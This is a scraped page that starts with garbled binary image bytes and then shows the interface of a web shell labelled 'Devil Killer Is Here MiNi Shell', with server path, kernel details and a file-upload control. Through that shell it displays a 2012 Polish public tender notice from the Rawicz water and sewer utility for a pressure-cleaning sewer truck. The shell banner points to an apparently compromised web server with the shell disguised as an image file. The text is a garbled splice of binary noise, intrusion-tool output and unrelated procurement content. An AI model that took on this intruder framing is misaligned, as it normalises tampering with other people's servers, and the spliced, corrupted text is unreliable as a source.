JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120518/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120518/111107-N-2012.html

<p class="kh_header"><b>Rawicz: Dostawa specjalistycznego samochodu służącego do ciśnieniowego czyszczenia kanalizacji oraz usuwania zanieczyszczeń.</b><br>
<b>Numer ogłoszenia: 111107 - 2012; data zamieszczenia: 18.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Wodociągów i Kanalizacji , ul. Półwiejska 20, 63-900 Rawicz, woj. wielkopolskie, tel. 065 546-10-59, faks 065 546-70-04.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa specjalistycznego samochodu służącego do ciśnieniowego czyszczenia kanalizacji oraz usuwania zanieczyszczeń..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa specjalistycznego samochodu służącego do ciśnieniowego mycia kanalizacji o średnicach przewodów od 50 mm do 600 mm,  wyposażonego w urządzenie ssące do pompowania nieczystości. 
2. Dostawa przedmiotu zamówienia loco siedziba Zamawiającego tj. 63-900 Rawicz ul. Półwiejska nr 20. 
3. Specjalistyczny samochód będzie odpowiadał następującym parametrom:
1) Zbiornik osadu cylindryczny, wykonany ze stali nierdzewnej, z dennicą otwieraną i ryglowana hydrauliczni, osadzony elastycznie na ramie podwozia.
2) Pojemność zbiornika osadu nie mniejsza niż 3.000 dm3. 
3) Wziernikowy wskaźnik poziomu napełnienia zbiornika osadu umieszczony w tylnej części zbiornika.
4) Zbiornik do wody wykonany ze stali nierdzewnej lub z tworzywa, cylindryczny lub modułowy, o pojemności nie mniejszej niż  3.000 dm3.
5) Zawór łączący obie komory, sterowany pneumatycznie, pozwalający wykorzystać całą pojemność zbiornika na wodę czystą. 
6) Akustyczny i optyczny sygnalizator rezerwy-braku wody w zbiorniku.
7) Zawór spustowy do usuwania wód nadosadowych.
8) Całkowita pojemność zbiorników osadu i wody czystej nie mniejsza niż 6 m3.
9) Opróżnianie zbiornika osadu poprzez unoszenie dennicy przy pomocy siłowników hydraulicznych oraz ewentualnie unoszenie zbiornika osadu przy pomocy siłownika hydraulicznego z zabezpieczeniem przed niekontrolowanym opadaniem zbiornika w przypadku awarii układu hydraulicznego. 
10) System wysokociśnieniowego płukania zbiornika osadu za pomocą systemu dysz wodnych umieszczonych wewnątrz zbiornika na jego obwodzie. 
11) Filtr wodny z wkładem ze stali nierdzewnej.
12) Pneumatyczny system opróżniania układu wodnego z resztek wody wraz z możliwością przedmuchania pompy ciśnieniowej.
13) Pompa próżniowa o następujących parametrach:  
 - wydajność pompy nie mniejsza niż 580 m3h,
 - chłodzenie pompy powietrzem z wentylatorem,
 - mechaniczny napęd pompy,
 - zakres pracy od - 0,085 Mpa do 0,05 Mpa.
 - licznik czasu pracy.
14) Pompa wysokociśnieniowa nurnikowa o parametrach:
- wydajność pompy nie mniejsza niż 150 dm3min. 
- ciśnienie nominalne nie mniejsze niż 16 Mpa. 
- płynna regulacja ciśnienia,
- płynna regulacja wydatku pompy, 
- mechaniczny napęd pompy, 
- licznik czasu pracy. 
15) Możliwość jednoczesnej pracy pompy wysokociśnieniowej i pompy podciśnieniowej, z zachowaniem maksymalnych parametrów pracy.
16) Pompy umieszczone w sposób uniemożliwiający dostęp osobom niepowołanym, zamknięte drzwiami umiejscowionymi pomiędzy kabina podwozia i zbiornikiem. Drzwi wykonane ze stali nierdzewnej lub z tworzywa sztucznego. 
17) Sterowanie unoszeniem i opróżnianiem zbiornika za pośrednictwem przewodowego pilota zdalnego sterowania. 
18) Zamykana hermetycznie skrzynka sterownicza, umieszczona z tyłu zabudowy, umożliwiająca sterowanie pracą urządzenia, wykonana ze stali nierdzewnej. 
19) Druga skrzynka sterownicza umieszczona na obudowie głównego bębna ciśnieniowego.
20) Panel kontrolny w kabinie kierowcy, umożliwiający włączenie główne całego urządzenia oraz włączenie świateł ostrzegawczych. 
21) Pilot przewodowego zdalnego sterowania, obsługujący następujące funkcje:
- otwieranie tylnej grodzi,
- otwieranie i zamykanie rygli hydraulicznych,
- unoszenie i opuszczanie zbiornika.
22) Bębny i węże wysokociśnieniowe:
- bęben duży napędzany hydraulicznie, obracany w osi pionowej o 180o, wykonany ze stali nierdzewnej, z regulacją przepływu, manualna prowadnica węża.
- wąż wysokociśnieniowy na dużym bębnie, z oplotem tekstylnym, długość minimum 120 mb. o średnicy minimalnej 25 mm, ciśnienie robocze 250 bar, promień gięcia 150 mm. 
- zestaw dysz kanałowych - minimum 6 sztuk. 
- bęben mały napędzany ręcznie umieszczony z tyłu zabudowy,
- wąż wysokociśnieniowy na małym bębnie, długości minimum 40 mb. o średnicy 15 mm. 
- pistolet wodny wraz z dwoma dyszami,
23) Rolka dolna i górna do prowadzenia węża.
24) Lampa przenośna do oświetlenia miejsca pracy z przewodem o długości 15 metrów. 
25) Wysięgnik układu ssącego, umieszczony u góry zabudowy, hydraulicznie obracany o kąt minimum 330o, obrót napędzany hydraulicznie, wysuw ramienia minimum 1000 mm. Sterowanie z głównej skrzynki sterującej.
26) Maksymalna głębokość ssania wysięgnikiem nie mniejsza niż 4 metry od poziomu jezdni.
27) Maksymalna głębokość ssania wężami nie mniejsza niż 8 metrów od poziomu jezdni.
28) Wąż ssący o średnicy wewnętrznej O 100 mm - 2 odcinki po 4mb.  
29) Urządzenie wewnątrz zbiornika osadu, umożliwiające usuwanie wód nadosadowych z pneumatycznym zaworem spustowym  O 100 mm, umieszczonym w dennicy zbiornika.
30) Zawór dolnego ssania. 
31) Układ cyrkulacji wody, wraz z urządzeniem podgrzewającym wodę zapobiegający zamarzaniu wody w układzie do - 18o C.
32) Zamykana na klucz skrzynka narzędziowa.
33) Zamykane na klucz pojemniki do przewozu wyposażenia wykonane ze stali nierdzewnej lub tworzywa sztucznego, umieszczone po obu stronach wzdłuż zbiornika osadu.
34) Ochronna rynna spustowa wykonana ze stali nierdzewnej, chroniąca osprzęt urządzenia przy opróżnianiu zbiornika osadu.
35) Imadło zamontowane na wysuwanym wsporniku z możliwością łatwego montażu-demontażu. 
36) Kolor lakierowania zabudowy - RAL niebieski
37) Obsługa urządzenia przez dwie osoby, w tym kierowca.  
38) Podwozie dwuosiowe, tylny most o przełożeniu, odpowiadający warunkom pracy w trudnym terenie.
4. Podwozie samochódu będzie odpowiadało następującym parametrom:
1) Samochód ciężarowy fabrycznie nowy, rok produkcji podwozia i nadbudowy 2012.
2) Dopuszczalna masa całkowita pojazdu do 12.000 kg.
3) Rozstaw osi - maksymalnie  3300 mm
4) Kabina krótka 3 osobowa, w kolorze RAL biały.  
5) Maksymalna wysokość samochodu z zabudową 4300 mm.
6) Belka koloru pomarańczowego umieszczone nad kabiną pojazdu, emitujące pulsujące światło ostrzegawcze ( lampa zespolona z oznaczeniem pogotowie wod-kan )
7) Lampa ostrzegawcza obrotowa z kloszem koloru pomarańczowego zamontowana w sposób trwały z tyłu zabudowy. Przełącznik ( załącz-wyłącz ) lampy ostrzegawczej umieszczony na desce rozdzielczej w kabinie kierowcy.  
8) Dodatkowe lusterko prawe tzw. krawężnikowe.
9) Centralny zamek sterowany pilotem.
10) Immobilizer.
11) Fotel kierowcy pneumatyczny z zagłówkiem i pasem bezpieczeństwa.
12) Fotel pasażera statyczny z zagłówkiem.
13) Osłona przeciwsłoneczna dla kierowcy i pasażera. 
14) Schowek w lewych i w prawych drzwiach.
15) Dodatkowe dywaniki gumowe.
16) Dodatkowe pokrowce foteli.
17) Układ kierowniczy wspomagany hydraulicznie. 
18) Koło kierownicy z regulowaną wysokością i pochyleniem. 
19) Tachograf cyfrowy.
20) Komputer pokładowy.
21) Przedni zderzak stalowy.
22) Wywietrznik dachowy.
23) Reflektory z tworzywa sztucznego, odporne na uderzenia.
24) Silnik  spalinowy o mocy minimum 160 KW, spełniający normy emisji spalin EURO 5.
25) Skrzynia biegów - 9 biegowa, dwuzakresowa ( z biegiem pełzającym ).
26) Zbiornik paliwa o pojemności nie mniejszej niż 150 dm3.
27) Przednie zawieszenie wyposażone w paraboliczne resory piórowe, amortyzatory i stabilizator.
28) Nośność osi przedniej - nie mniejsza niż 4600 kg.
29) Hamulce tarczowe przedniej osi.
30) Napędzana oś tylna z blokadą mechanizmu różnicowego.
31) Tylna oś z 4 miechowym zawieszeniem pneumatycznym, wyposażona w amortyzatory i stabilizator.
32) Nośność osi tylnej - nie mniejsza niż  8500 kg.
33) Hamulce tarczowe osi tylnej.
34) Hamulec silnikowy.
35) System ABS.
36) Koła - minimum R17,5, preferowane R22,5, wraz z kołem zapasowym umocowanym na stałe do podwozia.
37) Dźwiękowy sygnał biegu wstecznego.
38) Apteczka, gaśnica, trójkąt ostrzegawczy, podnośnik hydrauliczny, klin pod koła. 
5.  Przedmiot zamówienia winien posiadać aktualne świadectwo homologacji na pojazd kompletny, wydane przez ministra właściwego do spraw transportu lub decyzję zwalniającą obowiązku uzyskania świadectwa homologacji, wydana przez 
ministra właściwego do spraw transportu ( art. 68 ustawy z dnia 20 czerwca 1997 roku - Prawo o ruchu drogowym ).      
6. W ramach przedmiotu zamówienia Wykonawca przeszkoli 20 pracowników Zamawiającego w  zakresie obsługi dostarczonego  samochodu specjalistycznego. Szkolenie odbędzie się w terminie do 14 dni od dostarczenia Zamawiającemu 
samochodu w siedzibie ZWiK tj. 63-900 Rawicz ul. Półwiejska nr 20. 
7. Wykonawca do odbioru pojazdu dostarczy następujące dokumenty:
1) Dokumentacja techniczno-ruchowa.
2) Karta gwarancyjna kompletnego pojazdu ( dotyczy podwozia jak i zabudowy pojazdu ).
3) Instrukcja obsługi i użytkowania podwozia i zabudowy pojazdu.
4) Schematy elektryczne, hydrauliczne oraz pneumatyczne zabudowy pojazdu.
5) Karta pojazdu.
6) Kserokopię świadectwa homologacji lub decyzję zwalniającą z obowiązku uzyskania świadectwa homologacji, potwierdzoną za zgodność z oryginałem przez wykonawcę należy dołączyć do oferty.
7) Inne nie wymienione wyżej dokumenty niezbędne do rejestracji dostarczonego pojazdu jako pojazdu specjalnego zgodnie z wymogami przepisów dotyczących rejestracji pojazdów.
8) Deklaracje zgodności z Polską Normą dla zastosowanych urządzeń.
9) Certyfikaty wymagane polskim prawem dla pojazdu niezbędne dla potwierdzenia prawidłowego wykonania pojazdu.
10) Katalog techniczny części zamiennych oraz materiałów eksploatacyjnych.
11) Oświadczenie Wykonawcy o dostarczeniu samochodu bez wad prawnych i fizycznych.
12) Wykaz stacji serwisowych dla podwozia pojazdu oraz zabudowy pojazdu. 
8.  Odbiór pojazdu kompletnego:
1) O gotowości do dokonania dostawy samochodu Wykonawca powiadomi Zamawiającego w formie pisemnej na co najmniej 5 dni roboczych przed proponowanym terminem dostawy. 
2)  Odbiór nastąpi w dwóch etapach:
a) po dostawie kompletnego pojazdu do siedziby Zamawiającego wraz z kompletem dokumentacji - z ww czynności zostanie spisany protokół odbioru częściowego zadania, który nastąpi w terminie 3 dni od dostawy pojazdu.
b) po przeszkoleniu pracowników Zamawiającego w zakresie pełnej obsługi i eksploatacji pojazdu - z tych czynności zostanie spisany protokół odbioru końcowego zadania.  
c) protokół odbioru końcowego zostanie spisany po sprawdzeniu wszystkich funkcji samochodu oraz funkcji zabudowy, zaprezentowanych przez Wykonawcę w czasie pracy z udziałem Zamawiającego.
9.  Warunki gwarancji:
1) Okres rękojmi liczony będzie zgodnie z Kodeksem Cywilnym.
2) Wykonawca udziela gwarancji na pojazd:
a) 36 miesięcy na bezawaryjną pracę podwozia samochodu, licząc od dnia zatwierdzenia przez obie strony bezusterkowego protokołu odbioru końcowego pojazdu, 
b) 36 miesięcy na bezawaryjną pracę całego, zabudowanego na podwoziu zestawu urządzeń do czyszczenia sieci kanalizacyjnych i odsysania osadów, licząc od dnia zatwierdzenia przez strony bezusterkowego protokołu odbioru końcowego pojazdu.
10. Wykonawca gwarantuje autoryzowany serwis gwarancyjny.
1) Zakres i terminy przeglądów gwarancyjnych zarówno podwozia pojazdu jaki i zabudowy winny zostać określone w formie pisemnej i załączone do oferty. 
2) Wykonawca zapewnia wykonywanie przeglądów gwarancyjnych w Autoryzowanym Serwisie który jest zlokalizowany najbliższej względem siedziby Zamawiającego tz. 
a) punkt serwisowy wykonujący naprawy i przeglądy gwarancyjne podwozia pojazdu znajduje się 
b) punkt serwisowy wykonujący naprawy i przeglądy gwarancyjne zabudowy pojazdu znajduje się 
3)  Zamawiający dokonuje zgłoszenia wady pojazdu w okresie gwarancji w formie pisemnej na adres Wykonawcy, z wyszczególnieniem stwierdzonych wady. 
4)  Wykonawca zobowiązuje się dokonać naprawy gwarancyjnej i pogwarancyjnej niezwłocznie. Czas dojazdu serwisu w okresie obowiązywania gwarancji oraz po jej wygaśnięciu - do  48 godzin licząc od daty zgłoszenia wady przez Zamawiającego. 
5)  Wykonawca dokona naprawy gwarancyjnej i pogwarancyjnej pojazdu nie później niż w terminie 14 dni kalendarzowych od daty zgłoszenia wady przez Zamawiającego. 
6)  Niezależnie od pkt 10 ppkt 2b, naprawy oraz przeglądy gwarancyjne i pogwarancyjne odbywać się będą w siedzibie Zamawiającego, a w uzasadnionych przypadkach mogą odbywać się za zgodą Zamawiającego we wskazanym przez 
Wykonawcę serwisie. W takim przypadku demontaż, montaż i transport pojazdu lub jego zespołu do siedziby serwisu lub miejsca naprawy i ponownej dostawy do Zamawiającego, w okresie gwarancyjnym Wykonawca będzie wykonywać na swój koszt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 34.11.40.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Każdy Wykonawca przystępujący do przetargu jest obowiązany wnieść wadium w wysokości  20.000,00 zł. (słownie: dwadzieściatysięcyzłotych 00/100)
2. Wadium  musi obejmować cały okres związania ofertą i może być wniesione:  w pieniądzu,  poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancjach  bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9.11. 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. 
3. W przypadku wyboru wpłaty wadium w pieniądzu należy je wnieść przelewem na rachunek bankowy Zakładu Wodociągów i Kanalizacji w Rawiczu w Kredyt Banku S.A. Odział Rawicz 76 1500 2110 1215 1002 1025 0000.
Przy wnoszeniu wadium Wykonawca winien na blankiecie przelewu powołać się na nazwę zadania podaną przez Zamawiającego.  
Kopię dowodu przelewu potwierdzoną za zgodność z oryginałem należy dołączyć do oferty.  
Wydanie polecenia przelewu nie jest jednoznaczne z wniesieniem, dokonaniem zapłaty określonej kwoty wadium.  O uznaniu przez Zamawiającego, że wadium w pieniądzu wpłacono w wymaganym terminie, decyduje data i godzina wpływu środków na wskazany wyżej  rachunek Zamawiającego.
4. Jeżeli Wykonawca wnosi wadium w innej formie niż pieniężna, odpowiednie dokumenty w formie oryginału należy złożyć  (w terminie o którym mowa w punkcie 5) poprzez dołączenie do oferty w taki  sposób aby mogły one stanowić osobny dokument tzn. nie były trwale związane z ofertą i istniała możliwość bez naruszenia oferty odesłać ten dokument po jego wykorzystaniu. 
Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania oferta, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium we wszystkich okolicznościach określonych w ustawie Prawo zamówień publicznych  -   art. 46 ust. 4a i  5 ustawy PZP.
5. Wadium we wszystkich dopuszczonych formach wnosi się przed upływem terminu składania ofert tj. nie później niż do dnia  14.06.2012 roku do godz. 11.30. 
6. Oferta, która nie będzie zabezpieczona przez okres związania z ofertą akceptowalną formą wadium i nie zostanie wniesiona w wymaganym terminie oraz  kwocie  zostanie przez Zamawiającego uznana za odrzuconą a Wykonawca zostanie wykluczony. 
7. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
1) odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2) nie wniesie wymaganego zabezpieczenia należytego wykonania umowy;
3) zawarcie umowy w sprawie zamówienia publicznego stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy.
8. Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej  lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem pkt 10 niniejszego rozdziału (ust. 4a ustawy ).   
9. Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
10. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa  w art. 26 ust. 3, nie złożył  dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
11. Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie punktu 8 niniejszego rozdziału (art. 46 ust. 1 ustawy), jeżeli w wyniku ostatecznego rozstrzygnięcia protestu  jego oferta została  wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego. 
12. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę. 
13. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia-nie spełnia na podstawie załączonego do oferty oświadczenia Wykonawcy ( załącznik nr 2 do SIWZ ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać niezbędną wiedzę i doświadczenie do realizacji niniejszego zamówienia. 
Zamawiający uzna warunek za spełniony w przypadku, gdy Wykonawca wykaże na podstawie złożonych dokumentów, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie zrealizował dostawy minimum dwóch samochodów specjalistycznych do ciśnieniowego czyszczenia kanalizacji oraz usuwania zanieczyszczeń i osadów z wpustów ulicznych o parametrach odpowiadającym przedmiotowi zamówienia.
Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia-nie spełnia na podstawie załączonego do oferty wykazem zrealizowanych dostaw (załącznik nr 4 do SIWZ) i dokumentami potwierdzającymi, że dostawy  wymienione w wykazie zostały prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać potencjał techniczny niezbędny do realizacji niniejszego zamówienia. 
Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
Ocena spełnienia powyższego warunku dokonana będzie  na zasadzie spełnia-nie spełnia na podstawie załączonego do oferty oświadczenia Wykonawcy ( załącznik nr 2 do SIWZ ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować osobami zdolnymi do realizacji niniejszego zamówienia. 
Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
Ocena spełnienia powyższego warunku dokonana będzie  na zasadzie spełnia-nie spełnia na podstawie załączonego do oferty oświadczenia Wykonawcy ( załącznik nr 2 do SIWZ ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie niniejszego zamówienia.
Ocena spełnienia powyższego warunku dokonana będzie  na zasadzie spełnia-nie spełnia na podstawie załączonego do oferty oświadczenia Wykonawcy ( załącznik nr 2 do SIWZ ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

